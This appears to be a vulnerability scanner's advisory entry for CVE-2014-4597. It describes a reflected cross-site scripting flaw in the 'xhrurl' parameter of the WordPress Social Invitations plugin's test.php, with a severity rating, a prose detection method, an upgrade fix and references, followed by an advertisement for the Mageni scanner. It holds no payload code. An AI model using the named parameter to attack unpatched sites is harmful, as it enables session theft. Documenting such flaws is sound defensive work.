WordPress Social Invitations Plugin 'test.php' XSS Vulnerability

Published: 2014-08-26 10:28:57
CVE Author: NIST National Vulnerability Database (NVD)

CVSS Base Vector:
AV:N/AC:M/Au:N/C:N/I:P/A:N

Summary:
This host is installed with WordPress Social Invitations Plugin and is prone to cross site scripting vulnerability.

Detection Method:
Send a crafted data via HTTP GET request and check whether it is able to read cookie or not.

Technical Details:
Input passed via the 'xhrurl' HTTP GET parameter to test.php script is not properly sanitised before returning to the user.

Impact:
Successful exploitation will allow attacker to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Affected Versions:
WordPress Social Invitations Plugin version before 1.4.4.3

Recommendations:
Upgrade to version 1.4.4.3 or later.

Solution Type:
Vendor Patch

Detection Type:
Remote Vulnerability

NIST (National Institute of Standards and Technology) NVD (National Vulnerability Database)

https://nvd.nist.gov/vuln/detail/CVE-2014-4597

SecurityFocus Bugtraq ID:

https://www.securityfocus.com/bid/65268

References:

http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014070134
http://codevigilant.com/disclosure/wp-plugin-wp-social-invitations-a3-cross-site-scripting-xss
http://wordpress.org/plugins/wp-social-invitations

Search
Severity
Medium
CVSS Score
4.3

You never have to pay for a vulnerability scanning and management software again.

Tired of paying a subscription 'per asset' or 'per IP'? Well you can officially cancel your current subscription. Mageni provides a free, open source and enterprise-ready vulnerability scanning and management platform which helps you to find, prioritize, remediate and manage your vulnerabilities. It is free and always will be.